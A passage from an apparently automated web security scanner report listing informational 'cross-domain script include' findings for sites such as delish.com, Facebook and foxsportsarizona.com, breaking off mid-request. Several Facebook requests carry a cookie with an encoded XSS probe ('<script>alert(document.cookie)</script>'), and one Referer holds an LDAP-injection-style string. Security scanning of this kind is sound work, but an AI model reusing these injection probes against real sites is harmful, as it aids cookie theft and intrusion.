Link: <http://www.davidpoll.com/?p=403>; rel=shortlink
Set-Cookie: PHPSESSID=782daaca0cd252e2cad9d7049b165cec; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.439. http://www.delish.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 87366
Content-Type: text/html
Cache-Control: max-age=189
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


<script language="javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<!-- SHARE THIS SCRIPT DONT REMOVE -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...
<!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES -->
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

23.440. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 109796
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=337
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


<script language="javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<!-- SHARE THIS SCRIPT DONT REMOVE -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...
<!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES -->
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

23.441. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001 HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 93291
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=504
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


<script language="javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<!-- SHARE THIS SCRIPT DONT REMOVE -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...
<!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES -->
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

23.442. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=0feb3e2c1484ef81e4f5902f9eda5c12; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com
Last-Modified: Sun, 30 Jan 2011 01:51:21 GMT
ETag: "f0b5f444b53d8d069d3f3c230e6ce5fd"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...
<!-- FM STAMP Pushdown 970x66 Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/2555'></script>
...[SNIP]...
<!-- FM Leaderboard Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/936'></script>
...[SNIP]...

23.443. http://www.everyblock.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everyblock.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.everyblock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 30 Jan 2011 03:05:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13518
Last-Modified: Thu, 30 Dec 2010 18:49:16 GMT
Connection: close
Vary: Accept-Encoding
Expires: Sun, 30 Jan 2011 04:05:36 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>EveryBlock ... A news feed for your block</title>
<meta http-equiv="Content-Ty
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

23.444. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:38 GMT
Content-Length: 11463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/y_/r/U9jPqGxMK3h.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.445. http://www.facebook.com/HelenASPopkin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HelenASPopkin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /HelenASPopkin HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rt6y1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:48 GMT
Content-Length: 14974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.446. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:19:41 GMT
Content-Length: 7961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yc/r/JJt3yB2LDLj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.447. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:22:22 GMT
Content-Length: 9784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yy/r/XJ7kiAXTdg6.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.448. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:22:21 GMT
Content-Length: 11156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/y_/r/U9jPqGxMK3h.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.449. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DtsRk; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:50 GMT
Content-Length: 10625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.450. http://www.facebook.com/todd.kenreck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /todd.kenreck

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /todd.kenreck HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=VUacU; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:49 GMT
Content-Length: 14802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.451. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:53:35 GMT
Date: Sat, 29 Jan 2011 23:53:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?" type="text/javascript">
</script>
...[SNIP]...

23.452. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html HTTP/1.1
